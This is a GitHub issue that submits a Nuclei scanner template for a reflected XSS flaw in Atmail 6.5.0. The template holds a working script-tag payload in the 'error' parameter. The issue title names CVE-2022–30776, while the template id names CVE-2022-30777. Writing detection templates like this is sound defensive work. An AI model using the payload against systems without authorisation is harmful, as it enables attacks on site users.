### ISSUE TITLE
CVE-2022–30776

### ISSUE THREAD

**Issue by 3th1cyuk1** [projectdiscovery/nuclei-templates#4415]
### Template Information:

Cross-site scripting (XSS) vulnerability in sites using outdated Atmail hosting version 6.5.0 allows remote attackers to inject arbitrary web script or HTML via the “error” parameter.

### Nuclei Template:

```yaml
id: CVE-2022-30777

info:
  name: Atmail Xss
  author: 3th1c_yuk1
  severity: medium
  reference:
    - https://medium.com/@bhattronit96/cve-2022-30777-45725763ab59

requests:
  - method: GET
    path:
     - "{{BaseURL}}/atmail/index.php/admin/index/?error=1<ScRiPt>alert('XSS')</ScRiPt>"

    matchers-condition: and
    matchers:

      - type: word
        words:
          - "<script>alert('XSS')</script>"

      - type: word
        part: header
        words:
          - "text/html"
```
